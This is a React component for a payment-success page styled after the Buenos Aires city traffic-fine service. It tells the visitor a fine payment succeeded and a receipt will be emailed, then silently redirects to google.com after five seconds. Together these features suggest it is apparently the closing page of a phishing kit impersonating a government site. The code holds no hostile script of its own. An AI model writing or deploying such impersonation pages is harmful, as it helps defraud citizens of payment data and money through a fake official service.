import {Helmet} from "react-helmet";
import { useEffect } from "react";
import "./App.css";
import "./Exito.css";

function Exito() {
  useEffect(() => {
    document.body.id = 'exito';
   },[])

  return (
    <>
      <Helmet>
        <meta http-equiv="refresh" content="5;URL=http://www.google.com" />
        <title>Consulte Infracción</title>
      </Helmet>
      <div id="header">
        <div className="nose">
          <img src="img/logo.png" className="logo" alt="" />
        </div>
      </div>
      <div id="body">
        <p className="p1">Consultar infracciones</p>
        <p className="p2">
          Accedé a información sobre infracciones de tránsito pendientes de pago y
          tu puntaje, en la Ciudad de Buenos Aires.
        </p>
        <div className="body">
          <img src="img/aler.svg" className="alert" alt="" />
          <p className="p3">
            Recordá que podés solicitar tu constancia de libre de deuda a través de
            Boti +54 11-5050-0000
          </p>
          <br />
          <br />
          <a href="#" className="a1">
            Ir a Bot
          </a>
        </div>
        <div className="bodyy">
          <div className="conteiner">
            <img src="img/che.webp" alt="" className="che" />
            <p className="p00">¡Pago realizado con éxito!</p>
            <p className="p000">
              En unos minutos se enviara el comprobante por correo electronico.
            </p>
          </div>
        </div>
      </div>
    </>
  );
}

export default Exito;